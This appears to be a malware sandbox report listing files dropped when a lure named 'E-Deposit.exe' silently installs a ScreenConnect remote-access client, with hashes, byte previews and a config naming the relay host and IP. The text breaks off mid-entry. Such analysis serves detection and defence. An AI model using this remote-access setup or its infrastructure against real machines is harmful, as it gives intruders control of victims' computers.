                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):49152
                                                                                  Entropy (8bit):4.62694170304723
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                  MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                  SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                  SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                  SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36864
                                                                                  Entropy (8bit):4.340550904466943
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                  MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                  SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                  SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                  SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):57344
                                                                                  Entropy (8bit):4.657268358041957
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                  MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                  SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                  SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                  SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):176128
                                                                                  Entropy (8bit):5.775360792482692
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                  MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                  SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                  SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                  SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Core.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.034211651049746
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                  MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                  SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                  SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                  SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.InstallerActions.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11776
                                                                                  Entropy (8bit):5.273875899788767
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
                                                                                  MD5:73A24164D8408254B77F3A2C57A22AB4
                                                                                  SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                                                                  SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                                                                  SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o

                                                                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Windows.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639085961200334
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                  MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                  SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                  SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                  SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                  C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\E-Deposit.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13369344
                                                                                  Entropy (8bit):7.966971359391998
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:1Wh0cGwKWh0cGEWh0cGrWh0cGAWh0cGwWh0cGJWh0cG7:1WacMWactWacYWaczWacRWacaWacW
                                                                                  MD5:DBA166C47F82656C2399F7223DE2DB3F
                                                                                  SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                                                                  SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                                                                  SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Installer\59d35c.msi

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13369344
                                                                                  Entropy (8bit):7.966971359391998
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:1Wh0cGwKWh0cGEWh0cGrWh0cGAWh0cGwWh0cGJWh0cG7:1WacMWactWacYWaczWacRWacaWacW
                                                                                  MD5:DBA166C47F82656C2399F7223DE2DB3F
                                                                                  SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                                                                  SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                                                                  SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Installer\59d35e.msi

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13369344
                                                                                  Entropy (8bit):7.966971359391998
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:1Wh0cGwKWh0cGEWh0cGrWh0cGAWh0cGwWh0cGJWh0cG7:1WacMWactWacYWaczWacRWacaWacW
                                                                                  MD5:DBA166C47F82656C2399F7223DE2DB3F
                                                                                  SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                                                                  SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                                                                  SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Installer\MSID57F.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):423882
                                                                                  Entropy (8bit):6.57699164755521
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:wuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvz:wuH2anwohwQUv5uH2anwohwQUvz
                                                                                  MD5:AB2DCBCF1A9BE6E5B1477AA5F101E37A
                                                                                  SHA1:1C85B1C56C9FC04CC67B89928A416236452291D0
                                                                                  SHA-256:E8C66B279393D757FD7906D63D6E6EC8FDA0A7B296BE7555A22E08BC3F7BC828
                                                                                  SHA-512:79B86ED0272D44A1A399C8F7C6C113676369CFDAFD83C69D6B517CA58113C3CE14845713EBBCDFBC67B9FD8B182249AAAFE47B5F62D69FA21A73F05D038649FD
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSID57F.tmp, Author: Joe Security
                                                                                  Preview:...@IXOS.@.....@.-&Z.@.....@.....@.....@.....@.....@......&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E29000A5-D988-BF34-ACFB-64A448AB1544}^.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}f.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}c.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileMa

                                                                                  C:\Windows\Installer\MSID590.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Installer\MSID7B3.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Installer\SourceHash{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.1727426829039396
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:JSbX72FjxFlAGiLIlHVRpIh/7777777777777777777777777vDHFUVPV7rl0i8Q:JXHQI5wiV0F
                                                                                  MD5:CBEDF2C65F35023667659C5CB7AD856A
                                                                                  SHA1:9EEA39FADD963ADEC04FBB87E21989DFBACF0EC7
                                                                                  SHA-256:0214A3D479C450C204DEFA0A7466D5F7C26D280A665D8CD3B14895C04AF5FB8C
                                                                                  SHA-512:089C6C1C462C7750C22C0A8C719ABDD97CF20450A1B02EA77EFDEFE21E09A0E9DC9A6AA11B346C02BD88CF04A11FEBB0703BD8E132340FE95124A269E3EDDB29
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.8016387648894603
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:L8PhDuRc06WXzuFT5nP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SI6:yhD1zFTXzuph1fdaIdAxJH11
                                                                                  MD5:34A8C52EFBBB37599363A63A30D0E932
                                                                                  SHA1:1ABE2E86C5352B362F58606F927FE267F82A504D
                                                                                  SHA-256:CC1556D554C2917516FB7554BEAF11742A17CF25270298DBCBFC95F180933E5B
                                                                                  SHA-512:7F446DF0540E1661C1DC892B5DAFD65779CF3FE5EAAA3BBB5F2EFC04EA1D44420174A7C819210D41747B32FE6C5BD4D1336EBF8D17EB527FC745BEDF197D84D3
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}\DefaultIcon

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                  Category:dropped
                                                                                  Size (bytes):435
                                                                                  Entropy (8bit):5.289734780210945
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                  MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                  SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                  SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                  SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                  Malicious:false
                                                                                  Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.

                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):432221
                                                                                  Entropy (8bit):5.37517068681202
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauj:zTtbmkExhMJCIpErW
                                                                                  MD5:661EA1A8C7E6A4A782BEC293B743DB0F
                                                                                  SHA1:5D1742B5CA1EC39C1D87DEB40A9E0BD2D3AF02AC
                                                                                  SHA-256:88D0E2E754775D377147E676971BDD588A08CBEE7CA4E911FCBAA953D5CE97AF
                                                                                  SHA-512:F44A88B6F1BB063C1B70F440E91DE5A3A2D39637E1CB06E9272317AB4A8D03B8CD992020EE02ECB6836676C9FDE6EE82D3399A09C4D4EAB54B5222F833402769
                                                                                  Malicious:false
                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\3xs004yw.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.033616556478228
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLC/vXbAa3xT:2dL9hK6E46YPaDEIvH
                                                                                  MD5:BE24C9E257ED8EC178152AEE4016250D
                                                                                  SHA1:C90E325FC71AF04C42707F0EF692ABD6CD3F93C6
                                                                                  SHA-256:CE28835E5D79F494A8518F5BAAC924FE2B34A31FD041584E336A4E835517712D
                                                                                  SHA-512:B6A4E758CE006D896C6F7C18467222A0AABCFA0E0E02A885C1799726E1518AC86CD919404E5CDB23EB0982B4B55361356696ED6B1F4878405693673BEA903257
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a48%3a12</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\bweik44o.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
